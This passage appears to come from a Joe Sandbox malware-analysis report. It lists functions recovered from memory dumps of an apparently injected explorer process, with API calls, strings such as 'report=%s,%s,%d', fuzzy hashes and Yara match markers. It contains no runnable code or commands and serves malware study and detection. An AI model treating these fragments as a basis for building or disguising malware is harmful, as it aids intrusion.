                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                        • String ID: report=%s,%s,%d
                                                                                        • API String ID: 2370468470-3900697051
                                                                                        • Opcode ID: 4daf44155ab601f4b9997d0713db5028e76eb2f8d0cf9955896def2cec9de97e
                                                                                        • Instruction ID: 7f2e9f32ef02341808ec08e93304bb18e307bede6fd48fb61196edd420706480
                                                                                        • Opcode Fuzzy Hash: 4daf44155ab601f4b9997d0713db5028e76eb2f8d0cf9955896def2cec9de97e
                                                                                        • Instruction Fuzzy Hash: 4F116D36345B408AEB44CF62B9107AAB365FB88FC8F844025EE8A47B15DF7CC1858700
                                                                                        Function 10A59540 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: isprint$strstr
                                                                                        • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                        • API String ID: 1066184663-1590512397
                                                                                        • Opcode ID: 968d7a5d7c9dd6cd96a222c04ff57d8612769696b1737a9e40d992a460ab355c
                                                                                        • Instruction ID: 7d04de67e443bb46531ae28f58116b980ecb06fe2da9079f5a612cb756661185
                                                                                        • Opcode Fuzzy Hash: 968d7a5d7c9dd6cd96a222c04ff57d8612769696b1737a9e40d992a460ab355c
                                                                                        • Instruction Fuzzy Hash: 3341AF77208BC485CB21CF21F5903AAB7A5F786B94F855226DE9A07B54EB7CC09DCB00
                                                                                        Function 10A54390 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 10A54550: isdigit.MSVCRT ref: 10A54577
                                                                                        • tolower.MSVCRT ref: 10A54408
                                                                                          • Part of subcall function 10A541F0: malloc.MSVCRT ref: 10A54200
                                                                                          • Part of subcall function 10A541F0: free.MSVCRT ref: 10A54220
                                                                                        • memcpy.MSVCRT ref: 10A54489
                                                                                        • _errno.MSVCRT ref: 10A5448F
                                                                                        • strtod.MSVCRT ref: 10A544AD
                                                                                        • _errno.MSVCRT ref: 10A5450A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                        • String ID:
                                                                                        • API String ID: 3554981057-0
                                                                                        • Opcode ID: 7200a3fa8d53cadd7d061ffe909fc291e6ef79d9853763d1c0df63c8c8143f42
                                                                                        • Instruction ID: 0b4a7235458a979d63b582d91ebd591e7297a650ce1cc64de9c7c3691268fab4
                                                                                        • Opcode Fuzzy Hash: 7200a3fa8d53cadd7d061ffe909fc291e6ef79d9853763d1c0df63c8c8143f42
                                                                                        • Instruction Fuzzy Hash: 0841EF72704B918BEB11CF21E844B5A7BA1F784BD8F428012EE8643B54EF7DC889CB40
                                                                                        Function 08B8C615 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$_errno
                                                                                        • String ID:
                                                                                        • API String ID: 2288870239-0
                                                                                        • Opcode ID: ccc64328af1b0db835cb9ef547914a3ef69308864fd2cada8bec7e818de75906
                                                                                        • Instruction ID: 024919b981d315fd28f0fef3573203c7369c9ce3509030865ac2da062336c1d2
                                                                                        • Opcode Fuzzy Hash: ccc64328af1b0db835cb9ef547914a3ef69308864fd2cada8bec7e818de75906
                                                                                        • Instruction Fuzzy Hash: 6B314434294D09CFFBB8FB68D8B5B3936A2FB55317FA4446D9405C2250CB2CC496CB10
                                                                                        Function 10A704F7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __DestructExceptionObject.LIBCMT ref: 10A70522
                                                                                        • RaiseException.KERNEL32 ref: 10A7054B
                                                                                        • __DestructExceptionObject.LIBCMT ref: 10A705AC
                                                                                        • _getptd.LIBCMT ref: 10A704FF
                                                                                          • Part of subcall function 10A6E44C: _getptd_noexit.LIBCMT ref: 10A6E452
                                                                                          • Part of subcall function 10A6E44C: _amsg_exit.LIBCMT ref: 10A6E462
                                                                                        • _getptd.LIBCMT ref: 10A705B1
                                                                                        • _getptd.LIBCMT ref: 10A705BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                        • String ID: csm
                                                                                        • API String ID: 1037122555-1018135373
                                                                                        • Opcode ID: c69aeeb6cf3e5ee57093526bf81b4e958145f93547239d54de9947959953e68f
                                                                                        • Instruction ID: 02cd0fa1a42437928f7ca716e9efb4ae53b3b11a7c603d4729579030b98dbc21
                                                                                        • Opcode Fuzzy Hash: c69aeeb6cf3e5ee57093526bf81b4e958145f93547239d54de9947959953e68f
                                                                                        • Instruction Fuzzy Hash: 4221273A200685C6D720CF16E14075EB7B1F388BA5F45C216EF9A07B94CB3AE886CB41
                                                                                        Function 10A69508 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 10A69525
                                                                                        • _errno.LIBCMT ref: 10A6951A
                                                                                          • Part of subcall function 10A6B370: _getptd_noexit.LIBCMT ref: 10A6B374
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10A6956D
                                                                                        • _errno.LIBCMT ref: 10A6957C
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 10A69587
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 6682dec599855a07d7b19abdf7595b9cfce2771a6f84975eebf7efc1a048f2fe
                                                                                        • Instruction ID: dd6613ee778b75beae0846fe9de55d1b521af58b430da2eebaf69d79f62899ba
                                                                                        • Opcode Fuzzy Hash: 6682dec599855a07d7b19abdf7595b9cfce2771a6f84975eebf7efc1a048f2fe
                                                                                        • Instruction Fuzzy Hash: EE210BB6B043C182DF124B2596953AD6674F744BE4F504221FAAF0BB98DF6CC98A8F00
                                                                                        Function 10A5F540 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$malloc
                                                                                        • String ID:
                                                                                        • API String ID: 3301496367-0
                                                                                        • Opcode ID: 895c661018766f9c6bf3a8fe5b84f87bff48881f1b401f7c36eec5f9bcbf1c2f
                                                                                        • Instruction ID: 0d847678c782067c951717537f4157d11184801b89952c1f36b3d8f2e96a91aa
                                                                                        • Opcode Fuzzy Hash: 895c661018766f9c6bf3a8fe5b84f87bff48881f1b401f7c36eec5f9bcbf1c2f
                                                                                        • Instruction Fuzzy Hash: 3B316D76754B818ADA00CF66E44479AB7A4FB88BC8F955015EF9E53B15DF7CC089CB00
                                                                                        Function 08B97315 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 08B97340
                                                                                        • _errno.LIBCMT ref: 08B97335
                                                                                          • Part of subcall function 08B8ACA5: _getptd_noexit.LIBCMT ref: 08B8ACA9
                                                                                        • _errno.LIBCMT ref: 08B973E3
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 08B973EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1573762532-0
                                                                                        • Opcode ID: 3765b36ba8728675df94310d9eefa78603bf9daee7d1326bb690a740d70128c2
                                                                                        • Instruction ID: bdb9fec984d92f41d4735b60b9afefd3ded6f99155951a7d39a2f4c06d501110
                                                                                        • Opcode Fuzzy Hash: 3765b36ba8728675df94310d9eefa78603bf9daee7d1326bb690a740d70128c2
                                                                                        • Instruction Fuzzy Hash: 29412930538A5F8BDF28AF5994411B577D0FB54313B9842FEE8DAC7295EE24C442878A
                                                                                        Function 10A6F000 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _malloc_crt.LIBCMT ref: 10A6F029
                                                                                          • Part of subcall function 10A6C0A8: malloc.LIBCMT ref: 10A6C0D3
                                                                                          • Part of subcall function 10A6C0A8: Sleep.KERNEL32 ref: 10A6C0E6
                                                                                        • free.LIBCMT ref: 10A6F12A
                                                                                        • free.LIBCMT ref: 10A6F146
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2523592665-0
                                                                                        • Opcode ID: 94d4f082543a1208780c770f6c88e3739461fd818f4a174d9e4bd3dcad077cdd
                                                                                        • Instruction ID: b4bcd239a571db64ffb950726eb14a193795bb10d679eeae26e7f6f9aceec2f9
                                                                                        • Opcode Fuzzy Hash: 94d4f082543a1208780c770f6c88e3739461fd818f4a174d9e4bd3dcad077cdd
                                                                                        • Instruction Fuzzy Hash: E251B13A301B4193EB10DF26EA5075A73B8F788BD8F8542269F9D07B10EF38D5668744
                                                                                        Function 08B92F19 Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 08B92F3F
                                                                                        • _errno.LIBCMT ref: 08B92F34
                                                                                          • Part of subcall function 08B8ACA5: _getptd_noexit.LIBCMT ref: 08B8ACA9
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08B92FBE
                                                                                        • _errno.LIBCMT ref: 08B92FCF
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 08B92FDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 54bb80ef8a4511ca6d41a59b20e9a6df15b521eecef6917e1bdd9b11a28a770d
                                                                                        • Instruction ID: 1bf437b5383d5b59c3922bcc8a647607bb2dea1b7c379ef7b4b64645bd7ca4fe
                                                                                        • Opcode Fuzzy Hash: 54bb80ef8a4511ca6d41a59b20e9a6df15b521eecef6917e1bdd9b11a28a770d
                                                                                        • Instruction Fuzzy Hash: A8413C74914A1ACFCF24BB1984547B5B3E0FB54327B9442FED4E6C72A8E674C486C741
                                                                                        Function 10A779E0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 10A77A0B
                                                                                        • _errno.LIBCMT ref: 10A77A00
                                                                                          • Part of subcall function 10A6B370: _getptd_noexit.LIBCMT ref: 10A6B374
                                                                                        • _errno.LIBCMT ref: 10A77AAE
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 10A77AB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1573762532-0
                                                                                        • Opcode ID: 3765b36ba8728675df94310d9eefa78603bf9daee7d1326bb690a740d70128c2
                                                                                        • Instruction ID: 9a10f90bed2489351a01463b1de16bc2bf523d1528539e2a6a7aeb8294884eed
                                                                                        • Opcode Fuzzy Hash: 3765b36ba8728675df94310d9eefa78603bf9daee7d1326bb690a740d70128c2
                                                                                        • Instruction Fuzzy Hash: E74157B6B103D586EF549F2196402BE7BA0F780BD5F91C136EF9657A84D73ACA41C700
                                                                                        Function 10A735E4 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 10A7360A
                                                                                        • _errno.LIBCMT ref: 10A735FF
                                                                                          • Part of subcall function 10A6B370: _getptd_noexit.LIBCMT ref: 10A6B374
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10A73689
                                                                                        • _errno.LIBCMT ref: 10A7369A
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 10A736A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 54bb80ef8a4511ca6d41a59b20e9a6df15b521eecef6917e1bdd9b11a28a770d
                                                                                        • Instruction ID: 0b821352cd38a04e9dcdf1af3d3c9124e24f20d2ad01a81addd495d2f8be7f4d
                                                                                        • Opcode Fuzzy Hash: 54bb80ef8a4511ca6d41a59b20e9a6df15b521eecef6917e1bdd9b11a28a770d
                                                                                        • Instruction Fuzzy Hash: A6316AB7B102A192DB149B1695522BE73B1F740FE5F92C136EBD507B84EB2AC991C700
                                                                                        Function 08B8FE2C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __DestructExceptionObject.LIBCMT ref: 08B8FE57
                                                                                        • __DestructExceptionObject.LIBCMT ref: 08B8FEE1
                                                                                        • _getptd.LIBCMT ref: 08B8FE34
                                                                                          • Part of subcall function 08B8DD81: _getptd_noexit.LIBCMT ref: 08B8DD87
                                                                                        • _getptd.LIBCMT ref: 08B8FEE6
                                                                                        • _getptd.LIBCMT ref: 08B8FEF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                        • String ID: csm
                                                                                        • API String ID: 1546832303-1018135373
                                                                                        • Opcode ID: c69aeeb6cf3e5ee57093526bf81b4e958145f93547239d54de9947959953e68f
                                                                                        • Instruction ID: e36b9a8d2e99c6ee8962d6970066930984582ef6573530616d2793622fcd8e68
                                                                                        • Opcode Fuzzy Hash: c69aeeb6cf3e5ee57093526bf81b4e958145f93547239d54de9947959953e68f
                                                                                        • Instruction Fuzzy Hash: E8312B35228B04CFDA64EF18D491B69B3E2FB98352F15059DD49A83752DB31F846CB82
                                                                                        Function 10A5D290 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 10A5D2A9
                                                                                          • Part of subcall function 10A68350: _lock.LIBCMT ref: 10A68362
                                                                                          • Part of subcall function 10A5EBC0: std::_Lockit::_Lockit.LIBCPMT ref: 10A5EBD6
                                                                                          • Part of subcall function 10A5EBC0: std::_Lockit::~_Lockit.LIBCPMT ref: 10A5EBF9
                                                                                        • std::_Facet_Register.LIBCPMT ref: 10A5D30E
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 10A5D318
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 10A5D33C
                                                                                        • _CxxThrowException.LIBCMT ref: 10A5D34D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 885392049-3145022300
                                                                                        • Opcode ID: 64a55ad2a65c5a2b13196ce5ed728786bbc986c86f03896d78aaf631bd5ad827
                                                                                        • Instruction ID: d06bcb654ea9ae051d5f81ca281f54ecf1539639797ba68acf919afd7154d5ca
                                                                                        • Opcode Fuzzy Hash: 64a55ad2a65c5a2b13196ce5ed728786bbc986c86f03896d78aaf631bd5ad827
                                                                                        • Instruction Fuzzy Hash: D8119475704B4581DE10DF12E55029E6331FB98BE4F884225EA9D0BBA8EF7CD546C741
                                                                                        Function 10A5D360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 10A5D379
                                                                                          • Part of subcall function 10A68350: _lock.LIBCMT ref: 10A68362
                                                                                          • Part of subcall function 10A5EBC0: std::_Lockit::_Lockit.LIBCPMT ref: 10A5EBD6
                                                                                          • Part of subcall function 10A5EBC0: std::_Lockit::~_Lockit.LIBCPMT ref: 10A5EBF9
                                                                                        • std::_Facet_Register.LIBCPMT ref: 10A5D3DE
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 10A5D3E8
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 10A5D40C
                                                                                        • _CxxThrowException.LIBCMT ref: 10A5D41D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 885392049-3145022300
                                                                                        • Opcode ID: 9dcadbfabef63369ed3a9c2b81fe5f988b21fffef9dfa61188e71bb929362b16
                                                                                        • Instruction ID: f11d3ab24b42de5382eb0a42fa9c64ff5aa6753632472a308f37ce0ebe9f8be3
                                                                                        • Opcode Fuzzy Hash: 9dcadbfabef63369ed3a9c2b81fe5f988b21fffef9dfa61188e71bb929362b16
                                                                                        • Instruction Fuzzy Hash: FF115476304B4181DE10DF16E55036AB371FB88BE4F888221EA9D4BBA8EF7CD546C741
                                                                                        Function 08B8FF29 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd
                                                                                        • String ID: MOC$RCC$csm
                                                                                        • API String ID: 3186804695-2671469338
                                                                                        • Opcode ID: 60f91c4cd2c692a071ec2bb8139913598d0f43342b4004e07fafa54674971370
                                                                                        • Instruction ID: fd7b5c9c3e4651cd11bbf8bf8db1f7da7788ae1dcb0801b808f90a26b1b9dc88
                                                                                        • Opcode Fuzzy Hash: 60f91c4cd2c692a071ec2bb8139913598d0f43342b4004e07fafa54674971370
                                                                                        • Instruction Fuzzy Hash: 7DE0ED38911105CED7267BA8C4887B432A1FF1A20BF4A54E68444CB360DFBC5484CB57
                                                                                        Function 10A705F4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd
                                                                                        • String ID: MOC$RCC$csm
                                                                                        • API String ID: 3186804695-2671469338
                                                                                        • Opcode ID: 60f91c4cd2c692a071ec2bb8139913598d0f43342b4004e07fafa54674971370
                                                                                        • Instruction ID: 13a7358f21e29c74e0d4a7b39f159a4a746fe3dadbf8ceb2199a83e3048b08a2
                                                                                        • Opcode Fuzzy Hash: 60f91c4cd2c692a071ec2bb8139913598d0f43342b4004e07fafa54674971370
                                                                                        • Instruction Fuzzy Hash: 69E09A3EA40148CAD3015B2081067AC36B0F7E8B0AF9AD471A30107300CBFE68E4CF23
                                                                                        Function 10A54550 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: isdigit
                                                                                        • String ID:
                                                                                        • API String ID: 2326231117-0
                                                                                        • Opcode ID: 55f37baf0d8f77136a5d375516e9989e064f2e57ab552f069e110f6a2f3ec4c3
                                                                                        • Instruction ID: e78a6c2bcee079231f0f6ba33574360e0d9890dc5ce4dbca536c491cb6ac5481
                                                                                        • Opcode Fuzzy Hash: 55f37baf0d8f77136a5d375516e9989e064f2e57ab552f069e110f6a2f3ec4c3
                                                                                        • Instruction Fuzzy Hash: 11219635F94B93ABE7208B21E89075A6295FB00BEEF524426E54286D50FF3CCC9C8641
                                                                                        Function 10A5F4B0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3932841890-0
                                                                                        • Opcode ID: 644f09988f06e5470ffdb4b471bdebc185c64a0286ec77980e91656617b85f3e
                                                                                        • Instruction ID: 2f8dd951bd7486cecd53c6223d5d49019797034b6c5fd63f236d6f9c7d5007d4
                                                                                        • Opcode Fuzzy Hash: 644f09988f06e5470ffdb4b471bdebc185c64a0286ec77980e91656617b85f3e
                                                                                        • Instruction Fuzzy Hash: 4101D13571174282EF088F67B95475A6361FF89FC8F4880349D4A07B18DE7CC0868340
                                                                                        Function 10A68CDC Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
